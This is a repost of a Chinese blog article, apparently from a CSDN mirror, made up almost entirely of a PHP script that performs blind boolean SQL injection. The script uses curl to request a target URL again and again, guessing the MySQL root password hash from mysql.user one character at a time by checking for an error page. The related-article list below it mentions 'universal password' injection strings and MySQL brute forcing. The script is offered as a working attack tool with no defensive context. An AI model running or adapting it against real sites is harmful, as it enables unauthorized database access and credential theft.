一段代码,SQL注入猜解数据库用户密码

最新推荐文章于 2023-05-30 15:18:43 发布
最新推荐文章于 2023-05-30 15:18:43 发布
阅读量187 收藏
点赞数
文章标签: 数据库 php
原文链接:http://www.cnblogs.com/picaso/archive/2013/02/19/2916960.html
版权 
<?PHP

    set_time_limit(0);
    $base = "网址";
    $arr1 = range('A','G');
    $arr2 = range(0,9);
    $arr = array_merge($arr1,$arr2);
    $arr[] = '*';
    $ch = curl_init();
    for($i=34; $i<50; $i++){
        foreach($arr as $key=>$value){
                $query = urlencode("46 and (select substr((select password from mysql.user limit 1),".$i.",1))='".$value."'");
                $url = $base.$query;
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                curl_setopt($ch, CURLOPT_HEADER, 0);
                $back = curl_exec($ch);
                /*$code = curl_getinfo($ch,CURLINFO_HTTP_CODE);
                if($code == 200){
                    echo $value;
                    break;
                }
                */
                if(!strpos($back,'error.jsp')){
                    echo $value;
                    break;
                }
        }
    }

?>

 

转载于:https://www.cnblogs.com/picaso/archive/2013/02/19/2916960.html

weixin_33816946
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入万能密码
05-19
sql注入万能密码 全部的万能代码 如"or "a"="a 等等很多
SQL 注入基础系列1——猜解数据库
weixin_37537965的博客
12-26 2293
DVWA.security=low.SQL Injection 后台查询语句: //后台查询Sql语句是: SELECT first_name, last_name FROM users WHERE user_id = '$id'; //当user_id输入1时,实际执行的Sql语句是 SELECT first_name, last_name FROM users WHERE user_i...
burpsuite利用sql注入漏洞猜解数据库名称
u013930899的博客
10-31 1307
burpsuite利用sql注入漏洞猜解数据库
通过SQL手工注入拿到管理员密码--辛巴猫舍
ningmini的博客
05-20 1915
通过SQL手工注入拿到管理员密码–辛巴猫舍 靶场地址: http://rhiq8003.ia.aqlab.cn/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标url:http://rhiq8003.ia.aqlab.cn/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 出错,初步说明存在着注入漏洞 第二步 判断数据库字段数 在这里会使用
一段sql代码计算组织层级架构
最新发布
03-03
通过审查数据库中存在的SQL注入、未授权访问等安全问题,可以找到潜在的攻击路径并加强安全防护。 4.证据提取和分析: 在进行电子数据取证过程中,SQL代码可以帮助取证人员提取相关的数据证据,并加以分析。这些...
SQL数据库的高级sql注入的一些知识
09-11
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能有效过滤或验证用户输入时,使得恶意用户能够向数据库执行自定义的SQL命令。本文将深入探讨SQL注入的原理、常见攻击手段以及如何防范。 1. **SQL注入攻击...
SQL注入原理与解决方法代码示例
09-09
SQL注入是一种严重的网络安全威胁,它发生在应用程序处理用户输入的数据时不恰当地构建SQL查询时。攻击者可以通过在输入字段中插入恶意SQL代码,欺骗服务器执行非预期的数据库操作,从而获取敏感信息、修改或删除...
metinfo 后台sql注入1
08-03
SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,欺骗服务器执行非预期的数据库操作,从而获取敏感信息或破坏数据库。在MetInfo 6.1.0版本中,问题出现在多个DB::get_one函数调用中,这些调用使用了...
三步堵死 SQL Server注入漏洞
12-15
用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,获得某些想得知的数据,这就是所谓的SQL Injection,即SQL注入。 网站的恶梦――SQL注入 SQL注入通过网页对...
读取sdf数据库文件工具(含C#源码).zip
09-23
该资源为读取sdf数据库文件的查看工具与C#源码demo读取sdf文件数据库中数据,实测可用,可供参考,该资源花了一点功夫研究,对于不了解sdf文件的用户来说,看到一个sdf文件,该如何解析,确实有点难度,此资源完美的解决了该问题
mdb数据库密码破解器
12-23
mdb数据库密码破解器,1秒钟破解MDB密码,内含注册码,全权限,无限制。
sql手工注入实战
mulincong的博客
05-30 2194
sql手工注入封神台靶场
SQL注入总结(二)
yan_star的博客
08-07 552
手工注入的大致思路: 判断是否存在注入,注入是字符型还是数字型 猜解SQL查询语句中的字段数(order by 2) 确定显示的字段顺序(union select 1,2) 获取当前数据库(union select 1,database()) 获取数据库中的表(xx' union select 1,table_name from information_schema.tables whe...
实战演示手工SQL注入之半猜解查询
土拨鼠挖洞中的博客
04-16 1337
第一步:判断环境,寻找注入点确定注入点 : 数字型:   用'号报错 就有注入的希望     或者 and 1=1  and 1=2 检测  一个正常 一个返回不正常 95%存在注入点用 第二步:猜解表名:and exists (select * from 表名),如果存在该表名,返回正常,不存在返回错误;第三步:猜解字段and exists (selsect 字段名 from 表名)第四步:猜解...
数据库密码解密
dqforgive的博客
05-17 1315
C++代码 #include <iostream> #include <string> using namespace std; int main() { int passwd[] = { 28, 57, 86, 19, 47, 76, 9, 38, 66, 95, 28, 57, 86, 18, 47, 76 }; string mi = "Op-L_&"; //加密字符串 string ming = ""; for (int i = 0; i < m
暴力破解MySQL账号密码
GuangPeng_Ding的博客
01-14 981
例1: nmap --script=mysql-brute localhost -v 例2: nmap -p 3306 --script=mysql-brute.nse localhost
一段SQL注入语句
02-11
不好意思,我是一个遵循道德规范和法律规定的 AI,不能帮助您写恶意代码,包括 SQL 注入语句。这种行为可能损害数据库和网站的安全,并可能对其他人造成严重的损害。请遵循道德规范和法律规定,不要使用恶意代码

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值